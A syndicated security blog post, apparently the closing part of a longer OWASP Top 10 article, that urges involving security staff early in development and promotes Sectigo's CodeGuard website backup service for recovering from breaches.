Many companies still follow aspects of the waterfall methodology, so security testing waits until the end of the development cycle. This often leaves the development team with a long list of last-minute vulnerabilities. Fixing them takes time, which delays the release, creates friction between developers and security teams, and hurts the business.

In response, many companies have looked for ways to secure their code at every stage from the very beginning (not only to prevent cyber attacks, but also to stop security teams and developers from practically attacking each other). A popular and effective way to do this is to involve security staff from the earliest stages of product development. This cross-pollination lets both sides contribute and learn from each other. For example, OWASP Top 10 issues can be caught during calmer periods, when the pressure is not as high as it is shortly before release.

What to do if an OWASP Top 10 vulnerability is exploited

All the protective measures and strategies we have discussed sound great in theory, but in practice they are not always easy to implement. Security incidents can occur even when you think you are being careful. So what if a breach actually happens? Time is money, and you lose both for every second your website is down. Not to mention the damage any form of outage does to customer confidence.

One of the best ways to recover as quickly as possible and with minimal impact is to use a website backup service. With a backup of your site, you can quickly recover from hacks, crashes, malware infections, bad updates and so on.

Automatic backups are preferable, because it is easy to forget to make them manually. You will also want a service that stores the backups off-site. If an attacker breaks into your system, chances are they can delete your local back-ups just as easily. Web hosts often offer backup services, but their functionality is often inconvenient and limited because they work at the server level rather than the website level: you have to submit a ticket, wait for a response, and cannot pick a specific date or specific files.

Sectigo’s CodeGuard is an example of a website backup solution that ticks all the boxes above. It tracks every change to your site and automatically backs up your site’s files and databases daily, as shown below:

If anything goes wrong, recovery is literally a one-click process. All you have to do is log in, select the most recent backup (or any other), and the restore runs immediately.

Another advantage of a service like CodeGuard is that it is more than just a backup program. You also get:

  • Malware scanning that automatically detects and removes malware before it becomes a problem
  • An email backup service
  • A WordPress plugin for automatic backups of WordPress sites
  • A website migration tool for quick and easy relocation of your site
  • Test server set-up for trying out old backups
  • A full-featured API for configuring CodeGuard for you or your customers

It works with all major web platforms, and thanks to the user-friendly interface everything is ready in under 5 minutes. First, connect CodeGuard to your website’s root directory (or, if you are using the WordPress plugin, just install it and enter your unique key).

Then define your backup settings:

And CodeGuard does the rest. If you need to recover later, it is a quick and easy process:

Within seconds, your website is restored to its former state.

Protect your site with CodeGuard Backup

It is like an undo button for damage caused by a bug, cyber attack, bad update or other problem.

OWASP Top 10 – a valuable tool in your security arsenal

As we have seen, the OWASP Top 10 is an excellent foundation for your security measures. Protecting against the items on the OWASP Top 10 should really be the minimum, and ideally the first step towards a more comprehensive security program for your company. By defending against the most common vulnerabilities, you reduce your risk considerably and immediately.

Combine this with the right AppSec and organizational best practices to keep you secure for the long haul. Wherever you are in that process, breaches are always possible. You need a contingency plan such as CodeGuard to get back online as quickly as possible. Like your home security system, you hope it will never be needed. But if it is, you will be very glad to have it!

*** This is a syndicated Security Bloggers Network blog post from Hashed Out by The SSL Store™, written by Mark Vojtko. The original post can be found at: https://www.thesslstore.com/blog/keep-your-site-safe-with-the-owasp-top-10-list/
